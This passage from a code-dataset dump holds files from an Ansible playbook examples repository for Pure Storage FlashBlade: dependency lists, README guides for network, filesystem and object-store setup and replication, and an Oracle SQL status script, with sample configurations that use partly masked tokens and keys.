],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 57,
"license_type": "permissive",
"max_line_length": 16,
"num_lines": 7,
"path": "/flashblade/pure-fb-objectstore-replication/requirements.txt",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "ansible\npurity-fb==1.9.1\nnetaddr\npytz\nboto\nboto3\nbotocore"
},
{
"alpha_fraction": 0.7027027010917664,
"alphanum_fraction": 0.7837837934494019,
"avg_line_length": 8.5,
"blob_id": "5474ee5df0554223aa0a6025b5cb67706ffc96f8",
"content_id": "d357d1bd06ee1fe45adfd5099b2c0200efec4fbe",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 37,
"license_type": "permissive",
"max_line_length": 16,
"num_lines": 4,
"path": "/flashblade/pure-fb-filesystem-mount/requirements.txt",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "ansible\npurity-fb==1.9.1\nnetaddr\npytz"
},
{
"alpha_fraction": 0.5923076868057251,
"alphanum_fraction": 0.6293269395828247,
"avg_line_length": 39.51948165893555,
"blob_id": "a2266c0b4101fcf0f407bcda3d568db9d4fd4d66",
"content_id": "fe52cdec253278144f6f1635a57bcaa020927241",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6242,
"license_type": "permissive",
"max_line_length": 355,
"num_lines": 154,
"path": "/flashblade/pure-fb-network-setup/README.md",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "FlashBlade Network setup\n=========\n\nAnsible playbook and role to setup FlashBlade Network.\n\nRequirements\n------------\n**Requires: Python >=2.7, <=3.6 on Ansible control node.**\n\nAs purity-fb SDK supports Python >=2.7, <=3.6, We need to ensure that Installed Python version on Ansible control Node must be >=2.7 and <=3.6.\n\n* Install python-pip on Ansible control node.\n\n CentOS:\n ```bash\n $ sudo yum install epel-release\n $ sudo yum install python-pip\n $ sudo pip install --upgrade pip\n ```\n Ubuntu:\n ```bash\n $ sudo apt install python-pip\n $ sudo pip install --upgrade pip\n ```\n MacOS\n ```bash\n $ curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py\n $ python get-pip.py --user\n ```\n For more details to install Ansible on MacOS, follow this [link](https://docs.ansible.com/ansible/latest/installation_guide/intro_installation.html#installing-ansible-with-pip).\n \n* Install dependencies from \"requirements.txt\"\n ```bash\n $ sudo pip install -r requirements.txt \n ```\n* Install Ansible Collection for Pure Storage FlashBlade\n ```bash\n $ ansible-galaxy collection install purestorage.flashblade\n ```\n\nRole Variables\n--------------\n\nThere are two variable files \"fb_details.yml\" and \"fb_secrets.yml\" are holding the Ansible variables for the role at path `vars/<enviorement_name>`. \n\nThis role and playbook can be used to setup network on FlashBlade servers in different environments. To store role variable files, User can create different directories with `vars/<environment_name>`. User must specify `<environment_name>` while running `ansible-playbook` by specifying value in extra vars command line flag `-e \"env=<environment_name>\"`.\n\nAnsible playbooks require API token to connect to FlashBlade servers. API token can be obtained by connecting FlashBlade management VIP through ssh for a specific user and running the following purity command.\n ```\n $ ssh <pureuser>@<pure_fb_mgmt_ip>\n $ pureadmin list <username> --api-token -–expose\n ```\nUpdate \"api_token\" obtained from FlashBlade in \"fb_secrets.yml\" file and \"fb_url\" value with FlashBlade Management VIP in \"fb_details.yml\".\n\nEncrypt \"fb_secrets.yml\" using Ansible-Vault and enter password when prompted. This password is required to run playbook.\n```\n$ ansible-vault encrypt fb_secrets.yml\n```\n\nUpdate variables in `fb_details.yml` and `fb_secrets.yml` files to the desired values.\n\n* fb_details.yml\n ```\n # FBServer details\n array_inventory: \n FBServer1:\n fb_url: 10.xx.126.80\n network:\n dns: \n - { domain: \"purelab.purestorage.com\", nameservers: [10.12.133.15, 10.12.133.16] } \n ntp: \n - { servers: [10.22.93.14, 10.21.86.15] } \n ds: \n - { dstype: nfs, enable: true, uri: \"ldaps://lab.purestorage.com\", base_dn: \"DC=lab,DC=purestorage,DC=com\", bind_user: Administrator, bind_password: password } \n - { dstype: smb, enable: true, uri: \"ldaps://lab.purestorage.com\", base_dn: \"DC=lab,DC=purestorage,DC=com\", bind_user: Administrator, bind_password: password } \n - { dstype: management, enable: true, uri: \"ldaps://lab.purestorage.com\", base_dn: \"DC=lab,DC=purestorage,DC=com\", bind_user: Administrator, bind_password: password } \n subnet: \n - { name: VLAN2250, prefix: \"10.21.250.0/24\", vlan: 2250, gateway: 10.21.250.1, mtu: 1500 }\n - { name: VLAN2210, prefix: \"10.21.210.0/24\", vlan: 2210, gateway: 10.21.210.1 } # default mtu: 1500\n vip: \n - { name: datavip1-2250, address: 10.21.250.7 } # deafault services: data\n - { name: replvip1-2210, address: 10.21.210.22, services: replication } \n ```\n\n* fb_secrets.yml\n ```\n array_secrets: \n FBServer1:\n api_token: T-c61e4dec-xxxx-4264-87f8-315264d9e65a\n ```\n#### Note\n * Default `mtu` value is 1500 in subnet configuration. User can set desired \"mtu\" value in fb_details.yml file.\n * Only one replication interface(VIP) is allowed on FlashBlade server. If user try to create multiple replication VIP through Ansible playbook, There will be an error `Interface creation failed`.\n * To delete any of the network configuration use `state: disabled` in `fb_details.yml` variable file. When playbook executed with below variables in `fb_details.yml`, It will delete data VIP `datavip1-2250` and replication VIP `replvip1-2210`.\n ```\n # FBServer details\n array_inventory: \n FBServer1:\n fb_url: 10.xx.126.80\n network:\n vip: \n - { name: datavip1-2250, state: disabled }\n - { name: replvip1-2210, state: disabled } \n ```\n * To extend the network setup configuration on the fleet of FlashBlade Arrays, add multiple \"FBServer1...N\" blocks under array_inventory in \"fb_details.yml\" file.\n Example configuration to setup DNS on two FlashBlade servers.\n \n **fb_details.yml**\n ```\n # FBServer details\n array_inventory: \n FBServer1:\n fb_url: 10.xx.126.80\n network:\n dns: \n - { domain: \"purelab.purestorage.com\", nameservers: [10.12.133.15, 10.12.133.16] } \n FBServer2:\n fb_url: 10.xx.126.110\n network:\n dns: \n - { domain: \"purelab1.purestorage.com\", nameservers: [10.12.132.11, 10.12.132.14] } \n ```\n **fb_secrets.yml**\n \n ```\n array_secrets: \n FBServer1:\n api_token: T-c61e4dec-xxxx-4264-87f8-315264d9e65a\n FBServer2:\n api_token: T-d88e4dec-xxxx-4222-87g3-315264d9e77a\n ```\nDependencies\n------------\n\nNone\n\nExample Playbook\n----------------\n\n - name: FlashBlade Network setup\n hosts: localhost\n gather_facts: false\n vars_files:\n - \"vars/{{ env }}/fb_details.yml\"\n - \"vars/{{ env }}/fb_secrets.yml\"\n roles:\n - purefb_network_setup\n\nTo execute playbook, issue the following command:\n( Replace `<enviorement_name>` with the correct value )\n ```bash\n $ ansible-playbook purefb_network_setup.yml -e \"env=<enviorement_name>\" --ask-vault-pass\n ```\nEnter Ansible-Vault password which used to encrypt \"fb_secrets.yml\" file.\n"
},
{
"alpha_fraction": 0.6239787340164185,
"alphanum_fraction": 0.6407271027565002,
"avg_line_length": 31,
"blob_id": "b2a6058aaa0454ebfe51e822aa317a8938ad4e87",
"content_id": "23d2af4a65b0ea7bda5f6b4d92554c29f0b4d599",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4896,
"license_type": "permissive",
"max_line_length": 323,
"num_lines": 153,
"path": "/flashblade/pure-fb-objectstore-replication/README.md",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "FlashBlade Object Replication\n=========\n\nAnsible playbook and role for FlashBlade Array to Array and Array to S3 target(AWS) object Replication.\n\nRequirements\n------------\n\n**Requires: Python >=2.7, <=3.6 on Ansible control node.**\n\nAs purity-fb SDK supports Python >=2.7, <=3.6, We need to ensure that Installed Python version on Ansible control Node must be >=2.7 and <=3.6.\n\n* Install python-pip on Ansible control node.\n\n CentOS:\n ```bash\n $ sudo yum install epel-release\n $ sudo yum install python-pip\n $ sudo pip install --upgrade pip\n ```\n Ubuntu:\n ```bash\n $ sudo apt install python-pip\n $ sudo pip install --upgrade pip\n ```\n MacOS\n ```bash\n $ curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py\n $ python get-pip.py --user\n ```\n For more details to install Ansible on MacOS, follow this [link](https://docs.ansible.com/ansible/latest/installation_guide/intro_installation.html#installing-ansible-with-pip).\n \n* Install dependencies from \"requirements.txt\"\n ```bash\n $ sudo pip install -r requirements.txt \n ```\n* Install Ansible Collection for Pure Storage FlashBlade and AWS\n ```bash\n $ ansible-galaxy collection install purestorage.flashblade\n $ ansible-galaxy collection install community.aws\n ```\n\nRole Variables\n--------------\n\nThere are two variable files \"fb_details.yml\" and \"fb_secrets.yml\" are holding the Ansible variables for the role at path `vars/<enviorement_name>`. \n\nAnsible playbooks require API token to connect to FlashBlade servers. API token can be obtained by connecting FlashBlade management VIP through ssh for a specific user and running the following purity command.\n ```\n $ ssh <pureuser>@<pure_fb_mgmt_ip>\n $ pureadmin list <username> --api-token --expose\n ```\nUpdate \"api_token\" obtained from FlashBlade in \"fb_secrets.yml\" file and \"fb_url\" value with FlashBlade Management VIP in \"fb_details.yml\" \n\nEncrypt \"fb_secrets.yml\" using Ansible-Vault.\n```\n$ ansible-vault encrypt fb_secrets.yml\n```\n\n##### Case: 1 - Array to Array Object Replication\n\n* fb_details.yml\n ```\n # FBServer details\n array_inventory: \n FBServer1:\n fb_url: 10.xx.126.80\n FBServer2:\n fb_url: 10.yy.120.100 \n\n # FB-FB object replication\n S3Replication: \n replication1:\n src: { server: FBServer1, account: srcaccount, user: srcuser, bucket: srcbucket }\n dst: { server: FBServer2, account: dstaccount, user: dstuser, bucket: dstbucket }\n ```\n\n* fb_secrets.yml\n ```\n array_secrets: \n FBServer1:\n api_token: T-c61e4dec-xxxx-4264-87f8-315264d9e65a\n FBServer2:\n api_token: T-79ced0e5-1d36-yyyy-8741-66482f04c6d1 \n ```\n##### Case: 2 - Array to S3(AWS) Object Replication\n\n* fb_details.yml\n ```\n # FBServer details\n array_inventory: \n FBServer1:\n fb_url: 10.16.126.80 \n\n # FB-AWS object replication\n S3Replication: \n replication1:\n src: { server: FBServer1, account: srcaccount, user: srcuser, bucket: srcbucket }\n dst: { server: s3.amazonaws.com, region: us-west-2, credential: aws1, bucket: awsdstbucket }\n ```\n\n* fb_secrets.yml\n ```\n array_secrets: \n FBServer1:\n api_token: T-c61e4dec-xxxx-4264-87f8-315264d9e65a\n\n s3_secrets:\n aws1:\n access_id: AKIA2OFGHJ436YHILJ7T\n access_key: WeQHJYJ+xxx+yyyyy/5T4AdvwS1kBQwPA8QIW6\n ```\n\nNote: \n * To set bucket lifecycle policy, Add `noncurrent_version_expiration_days: 7` parameter with desired value in \"fb_details.yml\" for the buckets created on FlashBlade. For the buckets created on AWS along with `noncurrent_version_expiration_days: 7`, user can set `expiration_days: 6` for the current version of the bucket.\n **Example fb_details.yml with lifecycle policies**\n ```\n # FBServer details\n array_inventory: \n FBServer1:\n fb_url: 10.16.126.80 \n\n # FB-AWS object replication\n S3Replication: \n replication1:\n src: { server: FBServer1, account: srcaccount, user: srcuser, bucket: srcbucket, noncurrent_version_expiration_days: 7 }\n dst: { server: s3.amazonaws.com, region: us-west-2, credential: aws1, bucket: pureawsbucket, expiration_days: 6, noncurrent_version_expiration_days: 7 }\n ```\n\n\nDependencies\n------------\n\nNone\n\nExample Playbook\n----------------\n\n - name: FlashBlade object-store replication\n hosts: localhost\n gather_facts: false\n vars_files:\n - \"vars/{{ env }}/fb_details.yml\"\n - \"vars/{{ env }}/fb_secrets.yml\"\n roles:\n - purefb_object_replication\n\nTo execute the playbook, issue the following command:\n( Replace `<enviorement_name>` with the correct value )\n ```bash\n $ ansible-playbook object_replication.yml -e \"env=<enviorement_name>\" --ask-vault-pass\n ```\nEnter Ansible-Vault password which used to encrypt \"fb_secrets.yml\" file.\n"
},
{
"alpha_fraction": 0.5565637946128845,
"alphanum_fraction": 0.584634006023407,
"avg_line_length": 34.625,
"blob_id": "32623706e2764bd2d20c31a3863ba3304886cd44",
"content_id": "bfe836375c6663c18cd7b92336de1db43a49e820",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 8267,
"license_type": "permissive",
"max_line_length": 404,
"num_lines": 232,
"path": "/flashblade/pure-fb-filesystem-setup/README.md",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "FlashBlade File System setup\n=========\n\nAnsible playbook and role for FlashBlade File System provisioning and configuration.\n\n\nRequirements\n------------\n**Requires: Python >=2.7, <=3.6 on Ansible control node.**\n\nAs purity-fb SDK supports Python >=2.7, <=3.6, We need to ensure that Installed Python version on Ansible control Node must be >=2.7 and <=3.6.\n\n* Install python-pip on Ansible control node.\n\n CentOS:\n ```bash\n $ sudo yum install epel-release\n $ sudo yum install python-pip\n $ sudo pip install --upgrade pip\n ```\n Ubuntu:\n ```bash\n $ sudo apt install python-pip\n $ sudo pip install --upgrade pip\n ```\n MacOS\n ```bash\n $ curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py\n $ python get-pip.py --user\n ```\n For more details to install Ansible on MacOS, follow this [link](https://docs.ansible.com/ansible/latest/installation_guide/intro_installation.html#installing-ansible-with-pip).\n\n* Install dependencies from \"requirements.txt\"\n ```bash\n $ sudo pip install -r requirements.txt \n ```\n* Install Ansible Collection for Pure Storage FlashBlade\n ```bash\n $ ansible-galaxy collection install purestorage.flashblade\n ```\n\nRole Variables\n--------------\n\nThere are two variable files \"fb_details.yml\" and \"fb_secrets.yml\" are holding the Ansible variables for the role at path `vars/<enviorement_name>`. \n\nThis role and playbook can be used to setup network on FlashBlade servers in different environments. To store role variable files user can create different directories with `vars/<environment_name>`. User must specify `<environment_name>` while running `ansible-playbook` by specifying value in extra vars command line flag `-e \"env=<environment_name>\"`.\n\nAnsible playbooks require API token to connect to FlashBlade servers. API token can be obtained by connecting FlashBlade management VIP through ssh for a specific user and running the following purity command.\n ```\n $ ssh <pureuser>@<pure_fb_mgmt_ip>\n $ pureadmin list <username> --api-token -–expose\n ```\nUpdate \"api_token\" obtained from FlashBlade in \"fb_secrets.yml\" file and \"fb_url\" value with FlashBlade Management VIP in \"fb_details.yml\".\n\nEncrypt \"fb_secrets.yml\" using Ansible-Vault and enter password when prompted. This password is required to run playbook.\n```\n$ ansible-vault encrypt fb_secrets.yml\n```\n\nUpdate variables in `fb_details.yml` and `fb_secrets.yml` files to the desired values.\n\n* fb_details.yml\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem:\n - { name: database, count: 5, size: 32G, type: nfsv4.1, nfs_rules: '*(rw,no_root_squash)' } \n - { name: tools, size: 1G, type: smb, nfs_rules: '*(rw,no_root_squash)' } \n filesystem_snapshot: \n - { filesystem_name: tools, suffix: ansible } # snap_name : tools.ansible\n filesystem_snapshot_policy:\n - { name: daily, at: 11AM, keep_for: 86400, every: 86400, timezone: Asia/Shanghai } # optional params: timezone\n \n ```\n\n* fb_secrets.yml\n ```\n array_secrets: \n FBServer1:\n api_token: T-c61e4dec-xxxx-4264-87f8-315264d9e65a\n ```\n#### Note\n * To destroy any of the filesystem use `state: disabled` in `fb_details.yml` variable file. Destroyed file systems have 24 hours to be recovered. To recover file system, run the playbook with `state: enabled` within 24 hours of deletion. Filesyetm can be eradicated by using `state: disabled` and `eradication: true` together. Eradicating a file system will also eradicate all of its related snapshots. \n\n ##### fb_details.yml for different scenarios \n \n **Create a File System**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem:\n - { name: database, size: 32G, type: nfsv4.1, nfs_rules: '*(rw,no_root_squash)' } \n ```\n \n **Create 5 File Systems**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem:\n - { name: database, count: 5 size: 32G, type: nfsv4.1, nfs_rules: '*(rw,no_root_squash)' } # creates 5 filesystem with name database_01....database_05. \n ``` \n **Destroy File System**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem:\n - { name: database, state: disabled } \n ``` \n **Recover File System**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem:\n - { name: database, state: enabled } \n ```\n **Eradicate File System**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem:\n - { name: database, state: disabled, eradicate: true } \n ``` \n **Create File System snapshot**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem_snapshot: \n - { filesystem_name: tools, suffix: ansible } # snap_name : tools.ansible \n ```\n **Destroy File System snapshot**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem_snapshot: \n - { filesystem_name: tools, suffix: ansible, state: disabled }\n ```\n **Recover File System snapshot**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem_snapshot: \n - { filesystem_name: tools, suffix: ansible, state: enabled }\n ```\n **Recover File System from latest snapshot**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem_snapshot: \n - { filesystem_name: tools, suffix: ansible, restore_fs_from_snap: true }\n ```\n **Eradicate File System snapshot**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem_snapshot: \n - { filesystem_name: tools, suffix: ansible, state: disabled, eradicate: true }\n ```\n **Create File System snapshot policy**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem_snapshot_policy:\n - { name: daily, at: 11AM, keep_for: 86400, every: 86400, timezone: Asia/Shanghai } # optional params: timezone\n ```\n **Delete File System snapshot policy**\n ```\n array_inventory: \n FBServer1:\n fb_url: 10.12.231.151 \n filesystem_snapshot_policy:\n - { name: daily, state: disabled } # optional params: timezone\n ```\n * To extend the File System provisioning on the fleet of FlashBlade Arrays, Add multiple \"FBServer1...N\" blocks under array_inventory in \"fb_details.yml\" file.\n Example configuration to setup DNS on two FlashBlade servers.\n \n **fb_details.yml**\n ```\n # FBServer details\n array_inventory: \n FBServer1:\n fb_url: 10.xx.126.80\n filesystem:\n - { name: database, size: 32G, type: nfsv3 } \n FBServer2:\n fb_url: 10.xx.126.110\n filesystem:\n - { name: tools, size: 32G, type: nfsv4.1 } \n ```\n **fb_secrets.yml**\n ```\n array_secrets: \n FBServer1:\n api_token: T-c61e4dec-xxxx-4264-87f8-315264d9e65a\n FBServer2:\n api_token: T-d88e4dec-xxxx-4222-87g3-315264d9e77a\n ```\nDependencies\n------------\n\nNone\n\nExample Playbook\n----------------\n\n - name: FlashBlade filesystem setup\n hosts: \"localhost\"\n gather_facts: false\n vars_files:\n - \"vars/{{ env }}/fb_details.yml\"\n - \"vars/{{ env }}/fb_secrets.yml\"\n roles:\n - purefb_filesystem_setup\n\nTo execute playbook, issue the following command:\n( Replace `<enviorement_name>` with the correct value )\n ```bash\n $ ansible-playbook filesystem_setup.yml -e \"env=<enviorement_name>\" --ask-vault-pass\n ```\nEnter Ansible-Vault password which used to encrypt \"fb_secrets.yml\" file.\n"
},
{
"alpha_fraction": 0.6337099671363831,
"alphanum_fraction": 0.6466572284698486,
"avg_line_length": 35.31196594238281,
"blob_id": "0c2638d8fbe445c648ae201e80edb1e9e3370c14",
"content_id": "b38a8f585270ba5c4759eda6cf8f1f2c11abfc34",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 8496,
"license_type": "permissive",
"max_line_length": 358,
"num_lines": 234,
"path": "/flashblade/pure-fb-filesystem-replication/README.md",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "FlashBlade File System Replication, Failover and Failback/Reprotect\n=========\n\nAnsible playbooks and roles to perform FlashBlade File System Replication, Failover and Failback/Reprotect.\n\nRequirements\n------------\n\n**Requires: Python >=2.7, <=3.6 on Ansible control node.**\n\nAs purity-fb SDK supports Python >=2.7, <=3.6, We need to ensure that Installed Python version on Ansible control Node must be >=2.7 and <=3.6.\n\n* Install python-pip on Ansible control node.\n\n CentOS:\n ```bash\n $ sudo yum install epel-release\n $ sudo yum install python-pip\n $ sudo pip install --upgrade pip\n ```\n Ubuntu:\n ```bash\n $ sudo apt install python-pip\n $ sudo pip install --upgrade pip\n ```\n MacOS\n ```bash\n $ curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py\n $ python get-pip.py --user\n ```\n For more details to install Ansible on MacOS, follow this [link](https://docs.ansible.com/ansible/latest/installation_guide/intro_installation.html#installing-ansible-with-pip).\n\n* Install dependencies from \"requirements.txt\"\n ```bash\n $ sudo pip install -r requirements.txt \n ```\n* Install Ansible Collection for Pure Storage FlashBlade\n ```bash\n $ ansible-galaxy collection install purestorage.flashblade\n ```\n\nRole Variables\n--------------\n\nThere are two variable files \"fb_details.yml\" and \"fb_secrets.yml\" are holding the Ansible variables for the role at path `vars/<enviorement_name>`. \n\nThis role and playbook can be used to setup replication on FlashBlade servers in different environments. To store role variable files user can create different directories with `vars/<environment_name>`. User must specify `<environment_name>` while running `ansible-playbook` by specifying value in extra vars command line flag `-e \"env=<environment_name>\"`.\n\nAnsible playbooks require API token to connect to FlashBlade servers. API token can be obtained by connecting FlashBlade management VIP through ssh for a specific user and running the following purity command.\n ```\n $ ssh <pureuser>@<pure_fb_mgmt_ip>\n $ pureadmin list <username> --api-token --expose\n ```\nUpdate \"api_token\" obtained from FlashBlade in \"fb_secrets.yml\" file and \"fb_url\" value with FlashBlade Management VIP in \"fb_details.yml\".\n\nEncrypt \"fb_secrets.yml\" using Ansible-Vault and enter password when prompted. This password is required to run playbook.\n```\n$ ansible-vault encrypt fb_secrets.yml\n```\n\nUpdate variables in `fb_details.yml` and `fb_secrets.yml` files to the desired values.\n\n* fb_details.yml\n ```\n # FlashBlade inventory\n array_inventory: \n FBServer1:\n fb_url: 10.22.222.80\n FBServer2:\n fb_url: 10.22.222.100\n\n # Filesystem replication\n FSReplication: \n replication1:\n common_params: { repl_policy: hourly }\n client_details:\n - hosts: dc\n mount_point: /mnt/var/src-nfs\n src: { fb_name: FBServer1, data_vip: srcdatavip, fileshare: src-nfs }\n dst: { fb_name: FBServer2, data_vip: dstdatavip } \n ```\n\n* fb_secrets.yml\n ```\n array_secrets: \n FBServer1:\n api_token: T-c61e4dec-xxxx-xxxx-87f8-315264d9e65a\n FBServer2:\n api_token: T-79ced0e5-xxxx-xxxx-8741-66482f04c6d1 \n ```\n \n ##### Filesystem Replication \n In Filesystem replication local(src) and remote(dst) FlashBlades should be connected state. Replica-link will be established between local filesystem and remote filesystem with replication policy. \n **fb_details.yml for replication**\n ```\n # FlashBlade inventory\n array_inventory: \n FBServer1:\n fb_url: 10.22.222.80\n FBServer2:\n fb_url: 10.22.222.100\n\n # Filesystem replication\n FSReplication: \n replication1:\n common_params: { repl_policy: hourly }\n src: { fb_name: FBServer1, fileshare: src-nfs }\n dst: { fb_name: FBServer2 } \n ```\n \n ##### Filesystem failover \n In Filesystem failover target(dst) filesystem to be promoted and all the clients must then be directed to the target array. The local file system is then demoted.\n \n Enter Clients inventory detail in `hosts.ini` and specify `mount_point` under \"client_details\" section in `fb_details.yml` file.\n Data VIP is required to redirect clients from local to remote array.\n **fb_details.yml for failover**\n ```\n # FlashBlade inventory\n array_inventory: \n FBServer1:\n fb_url: 10.22.222.80\n FBServer2:\n fb_url: 10.22.222.100\n\n # Filesystem replication\n FSReplication: \n replication1:\n common_params: { repl_policy: hourly }\n client_details:\n - hosts: dc\n mount_point: /mnt/var/src-nfs\n src: { fb_name: FBServer1, data_vip: srcdatavip, fileshare: src-nfs }\n dst: { fb_name: FBServer2, data_vip: dstdatavip } \n ``` \n ##### Filesystem failback/reprotect \n Filesystem failback required to stop writes on the promoted remote file system, promoting source filesystem and redirecting all the clients to local filesystem. The remote file system is then demoted.\n \n Enter Clients detail in `hosts.ini` and provide details of mount point and \"host/group_name\" under \"client_details\" section in `fb_details.yml` file.\n Data VIP is required to redirect clients from local to remote array.\n **fb_details.yml for failover**\n ```\n # FlashBlade inventory\n array_inventory: \n FBServer1:\n fb_url: 10.22.222.80\n FBServer2:\n fb_url: 10.22.222.100\n\n # Filesystem replication\n FSReplication: \n replication1:\n common_params: { repl_policy: hourly }\n client_details:\n - hosts: dc\n mount_point: /mnt/var/src-nfs\n src: { fb_name: FBServer1, data_vip: srcdatavip, fileshare: src-nfs }\n dst: { fb_name: FBServer2, data_vip: dstdatavip } \n ``` \n\nDependencies\n------------\n\nNone\n\nExample Playbook\n----------------\n\n* Filesystem Replication\n \n ```\n - name: FlashBlade filesystem setup\n hosts: \"localhost\"\n gather_facts: false\n vars_files:\n - \"vars/{{ env }}/fb_details.yml\"\n - \"vars/{{ env }}/fb_secrets.yml\"\n roles:\n - purefb_filesystem_setup\n ```\n\n* Filesystem failover\n ```\n - name: FlashBlade filesystem failover\n hosts: all\n vars_files:\n - \"vars/{{ env }}/fb_details.yml\"\n - \"vars/{{ env }}/fb_secrets.yml\"\n roles:\n - purefb_filesystem_failover\n ```\n* Filesystem failback\n ```\n - name: FlashBlade filesystem failback/Reprotect\n hosts: all\n vars_files:\n - \"vars/{{ env }}/fb_details.yml\"\n - \"vars/{{ env }}/fb_secrets.yml\"\n roles:\n - purefb_filesystem_failback\n ```\nTo execute playbook, issue the following command:\n( Replace `<enviorement_name>` with the correct value )\n* Replication\n ```bash\n $ ansible-playbook filesystem_replication.yml -e \"env=<enviorement_name>\" --ask-vault-pass\n ```\n* Failover\n Using Remote host SSH key(Replace `<ssh-key-path>` with ssh private key path)\n ```bash\n $ ansible-playbook filesystem_failover.yml -i hosts -e \"env=<enviorement_name>\" --ask-vault-pass --key-file=<ssh-key-path>\n ```\n Enter vault password when prompted.\n \n Using Remote host password(Not Recommended)\n ```bash\n $ ansible-playbook filesystem_failover.yml -i hosts -e \"env=<enviorement_name>\" --ask-vault-pass --ask-pass --ask-become-pass\n ```\n Enter vault password, hosts ssh password and root password.\n\n* Failback\n Using Remote host SSH key(Replace `<ssh-key-path>` with ssh private key path)\n ```bash\n $ ansible-playbook filesystem_failback.yml -i hosts -e \"env=<enviorement_name>\" --ask-vault-pass --key-file=<ssh-key-path>\n ```\n Enter vault password when prompted.\n\n Using Remote host password(Not Recommended)\n ```bash\n $ ansible-playbook filesystem_failback.yml -i hosts -e \"env=<enviorement_name>\" --ask-vault-pass --ask-pass --ask-become-pass\n ```\n Enter vault password, hosts ssh password and root password.\n\n**Note:** If you are using MacOS as Ansible control node and using password to connect to remote hosts, SSH connection with password not supported.\nThe workaround for this limitation is to pass `-c paramiko` flag in ansible-playbook command. Install paramiko using `pip install paramiko`."
},
{
"alpha_fraction": 0.6604413986206055,
"alphanum_fraction": 0.6994906663894653,
"avg_line_length": 27.047618865966797,
"blob_id": "382de44c052ef331c2180d2028b176d6ad910db6",
"content_id": "4aeb66cf5a20c345877211698ab904c064efe889",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 1178,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 42,
"path": "/oracle-database/files/showDB.sql",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "set feed off\nset verify off\nset pagesize 0\nset linesize 132\nset echo off\nset heading off\nset termout off\n\ncol ba noprint new_value ba\ncol dc noprint new_value dc\ncol dn noprint new_value dn\ncol ds noprint new_value ds\ncol ht noprint new_value ht\ncol sa noprint new_value sa\ncol sd noprint new_value sd\ncol st noprint new_value st\ncol su noprint new_value su\n\nSELECT to_char(sysdate,'dd/mm/yy hh24:mi:ss') as sd from dual;\nSELECT banner ba from v$version;\nSELECT to_char(created,'dd/mm/yy hh24:mi:ss') as dc from v$database;\nSELECT instance_name dn, host_name ht, to_char(startup_time,'dd/mm/yy hh24:mi:ss') ds, status st FROM v$instance;\nSELECT to_char(sum(bytes)/1024/1024/1024,'9,999.99') as sa from dba_data_files;\nSELECT to_char(sum(bytes)/1024/1024/1024,'9,999.99') as su from dba_segments;\n\nset termout on\n\nprompt Current Time : &sd\nprompt\nprompt Database Details\nprompt ===============================================\nprompt Hostname : &ht\nprompt Database Name : &dn\nprompt Version : &ba\nprompt Date Created : &dc\nprompt Date Started : &ds\nprompt DB Status : &st\nprompt Allocated Space : &sa GB\nprompt Used Space : &su GB\n\nprompt\nEXIT\n"
},
{
"alpha_fraction": 0.6156749725341797,
"alphanum_fraction": 0.6347472071647644,
"avg_line_length": 36.140220642089844,
"blob_id": "33fc6d80e6673a330625ee6ac720b2ff182980ef",
"content_id": "9959ef1bacaf18d4c8351a533a46756991d0b691",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 10067,
"license_type": "permissive",
"max_line_length": 329,
"num_lines": 271,
"path": "/flashblade/pure-fb-objectstore-setup/README.md",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
